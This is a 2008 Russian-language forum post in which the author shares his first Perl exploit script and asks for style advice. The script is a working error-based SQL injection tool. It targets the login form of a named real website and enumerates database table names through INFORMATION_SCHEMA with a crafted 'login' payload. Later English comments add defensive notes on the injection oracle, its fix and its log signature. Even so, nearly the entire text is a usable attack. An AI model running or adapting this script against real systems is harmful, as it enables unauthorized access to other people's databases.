
23.06.2008, 10:03
Подскажите плиз!
Написал свой первый скрипт-exploit на перле, подскажите, как правильнее/лучше написать с точки зрения синтаксиса?
Скрипт рабочий.
Код:
#!/usr/bin/perl
# Review notes (defender's view).  This script drives an error-based SQL
# injection through the login form at $url: the posted 'login' value is
# evidently concatenated into a database query by the remote application,
# and the application reflects MySQL's own error text back into the page
# (GetTables() below matches on that text).  Server-side, parameterized
# queries plus a generic error page remove both halves of that oracle.
# No `use strict` / `use warnings`: every undeclared variable in this file
# ($i, $char, $post, $response, $content) is a package global.
use LWP;
my $browser = LWP::UserAgent->new;
my $url = "http://e-rfo.ru/?i=logon";
print "Starting sql-code injection...\n";
# `&name(...)` is legacy call syntax; the modern spelling is GetTables(...).
# Arguments: empty CHAR() code list, prefix length 0, depth 0, empty prefix.
&GetTables('',0,0,'');
# GetTables($ascii_set, $tnl, $node, $tn)
#   $ascii_set - comma-separated ASCII codes of the table-name prefix so far
#   $tnl       - length of that prefix
#   $node      - recursion depth
#   $tn        - the same prefix as text
# Depth-first recursive walk that tries to extend the prefix by one more
# character; each candidate costs one POST to $url (file-level global).
# Prints every prefix the server confirms and, when a prefix cannot be
# extended further, prints it as a full table name.
# Detection on the server side: every probe is a POST to the login endpoint
# whose 'login' field contains INFORMATION_SCHEMA.TABLES and whose 'password'
# field is empty -- a burst of such requests is an unmistakable log signature.
# Style note: classic arg unpacking would be `my ($ascii_set, $tnl, $node,
# $tn) = @_;` on one line instead of the four assignments below.
sub GetTables{
my ($ascii_set,$tnl, $node, $tn);
$ascii_set = $_[0];
$tnl = $_[1];
$node = $_[2];
$tn= $_[3];
my $curr_tnl = $tnl+1;
my $curr_tn = '';
my $curr_set = '';
my $curr_node = $node+1;
my $table_finded = 0;
# 95..122 covers '_', '`' and 'a'..'z'.  $i is undeclared, so it is a package
# global shared by every recursion level; `for my $i` would scope it.
for $i (95..122)
{
# Text form of the candidate prefix (previous prefix plus one character).
if (length($tn) == 0)
{
$curr_tn = chr($i);
}
else
{
$curr_tn = "$tn" .chr($i);
}
# Same prefix as a comma-separated list of ASCII codes for CHAR().
if (length($ascii_set) == 0)
{
$curr_set = $i;
}
else
{
$curr_set = $ascii_set.','.$i;
}
# $char and $post are undeclared (package globals); $post is the value sent
# in the 'login' field.
$char = 'CHAR('.$curr_set.')';
$post = "admin' AND 1=(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE LEFT(TABLE_NAME,$curr_tnl)=$char UNION ALL SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE LEFT(TABLE_NAME,$curr_tnl)=$char)/*";
$response = $browser->post($url, ['login' => $post, 'password' => '', 'op' => 'login']);
$content = $response->content;
# The oracle: the page leaks the MySQL error text verbatim.  A generic error
# page on the server makes this condition never true.  Note the right-hand
# side is a plain string used as a regex; `m{...}` would make that explicit.
if ($content =~ "Subquery returns more than 1 row")
{
print "LEFT(TABLE_NAME,$curr_tnl) is: ",$curr_tn,"\n";
$table_finded = 1;
GetTables($curr_set, $curr_tnl, $curr_node, $curr_tn);
# The depth check runs only after the recursive call has returned, so it
# does not actually bound the recursion.
if ($curr_node > 5)
{
return;
}
}
else
{
# Reached 'z' (122) with no confirmed extension at this depth: the
# substr() strips the trailing 'z' so what is printed is $tn itself.
if (length($curr_tn) > 1 && $table_finded == 0 && $i == 122)
{
print "Table name is: " .substr($curr_tn,0,length($curr_tn)-1)."\n";
}
}
# Without `use strict`, `false` is the bareword string "false", which
# numifies to 0 -- so this reads as `is_success == 0`.  It is also evaluated
# after $content has already been used; `unless ($response->is_success)`
# placed right after the post() would be the usual form.
if ($response->is_success == false)
{
print "connection error...\n";
}
# Reset is redundant: the next iteration rebuilds $curr_set unconditionally.
$curr_set = '';
}
}